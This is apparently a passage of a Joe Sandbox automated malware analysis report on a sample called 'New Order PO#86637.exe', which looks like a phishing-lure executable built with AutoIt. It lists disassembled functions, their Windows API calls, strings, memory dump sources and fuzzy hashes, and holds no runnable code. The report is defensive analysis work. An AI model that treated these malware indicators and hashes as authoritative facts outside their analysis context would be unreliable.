                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                            • String ID: X$pWH
                                                                            • API String ID: 85490731-941433119
                                                                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • _memmove.LIBCMT ref: 00401B57
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                            • String ID: @EXITCODE
                                                                            • API String ID: 2734553683-3436989551
                                                                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0420A0CD
                                                                            • ExitProcess.KERNEL32(00000000), ref: 0420A0EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CreateExit
                                                                            • String ID: D
                                                                            • API String ID: 126409537-2746444292
                                                                            • Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                                                            • Instruction ID: 79091a6e2e2a5ed9ba2097dcc18b11dcd1e7a6e9297e00064157fe49452f90fe
                                                                            • Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                                                            • Instruction Fuzzy Hash: 30F0E171A5024CABDB60DFE0CC49FEE77B9BF04701F40C509FA1A9A181DA75A5089751
                                                                            Strings
                                                                            • C:\Users\user\Desktop\New Order PO#86637.exe, xrefs: 00410107
                                                                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _strcat
                                                                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\New Order PO#86637.exe
                                                                            • API String ID: 1765576173-4004636104
                                                                            • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                            • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                            • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1794320848-0
                                                                            • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                            • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 2429186680-0
                                                                            • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                            • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 0043214B
                                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                            • _malloc.LIBCMT ref: 0043215D
                                                                            • _malloc.LIBCMT ref: 0043216F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 680241177-0
                                                                            • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                            • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 004678F7
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast__wsplitpath_malloc
                                                                            • String ID:
                                                                            • API String ID: 4163294574-0
                                                                            • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                            • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                            • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                            • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                            APIs
                                                                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                            • _strcat.LIBCMT ref: 0040F786
                                                                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3199840319-0
                                                                            • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                            • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: FreeInfoLibraryParametersSystem
                                                                            • String ID:
                                                                            • API String ID: 3403648963-0
                                                                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                            • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                            • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                            • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                            APIs
                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                            • __lock_file.LIBCMT ref: 00414A8D
                                                                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                            • __fclose_nolock.LIBCMT ref: 00414A98
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 00415012
                                                                            • __ftell_nolock.LIBCMT ref: 0041501F
                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2999321469-0
                                                                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                            APIs
                                                                              • Part of subcall function 04209968: GetFileAttributesW.KERNELBASE(?), ref: 04209973
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0420A227
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesCreateDirectoryFile
                                                                            • String ID:
                                                                            • API String ID: 3401506121-0
                                                                            • Opcode ID: 167712b6dc10c101621f85d1ffa6e81ed773490ba9fcaaeac8f5aea481633851
                                                                            • Instruction ID: 5d255c1751910a1b214800631d195203ea97289354571c21a4c6be67b6c2d6f2
                                                                            • Opcode Fuzzy Hash: 167712b6dc10c101621f85d1ffa6e81ed773490ba9fcaaeac8f5aea481633851
                                                                            • Instruction Fuzzy Hash: 86517531A2120D97EF14EFA0C944BEF7379EF58700F4085A9A509E71C0EB79AB45CBA5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                            • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
